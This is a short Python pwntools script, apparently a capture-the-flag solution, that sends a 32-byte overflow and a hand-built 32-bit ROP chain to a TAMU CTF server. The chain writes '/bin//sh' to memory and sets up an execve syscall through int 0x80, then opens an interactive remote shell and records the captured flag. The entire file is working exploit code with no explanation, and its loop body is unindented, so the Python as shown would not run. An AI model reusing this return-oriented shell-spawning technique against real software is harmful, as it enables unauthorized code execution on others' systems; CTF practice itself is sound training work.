Rating: 1.0

```python
# -*-coding:utf-8 -*
from pwn import *

p = "A"*32

p += p32( 0x0807338a) # pop edx ; ret
p += p32( 0x080f0060)

p += p32( 0x080bc396) # pop eax ; ret
p += '/bin'

p += p32( 0x0805512b) # mov dword ptr [edx], eax ; ret

p += p32( 0x0807338a) # pop edx ; ret
p += p32( 0x080f0064)

p += p32( 0x080bc396) # pop eax ; ret
p += '//sh'

p += p32( 0x0805512b) # mov dword ptr [edx], eax ; ret

p += p32( 0x0807338a) # pop edx ; ret
p += p32( 0x080f0068)

p += p32( 0x080496b3) # xor eax, eax ; ret

p += p32( 0x0805512b) # mov dword ptr [edx], eax ; ret

p += p32( 0x08058b0f) # pop ebx ; ret
p += p32( 0x080f0060)
p += p32( 0x080e4325) # pop ecx ; ret
p += p32( 0x00000000)

p += p32( 0x0807338a) # pop edx ; ret
p += p32( 0x00000000)

p += p32( 0x080496b3) # xor eax, eax ; ret

for i in range(11):
p += p32( 0x0807ebcf) # inc eax ; ret

p += p32( 0x0807398e) # int 0x80

re = remote("pwn.ctf.tamu.edu",4325)

re.send("test"+"\n")
re.send("test"+"\n")
re.send("nom"+"\n")
re.send("y"+"\n")
re.send("2"+"\n")
re.send(p)
re.send("\n")
re.interactive()

re.close();
#flag = gigem{r37urn_0f_7h3_pwn}

```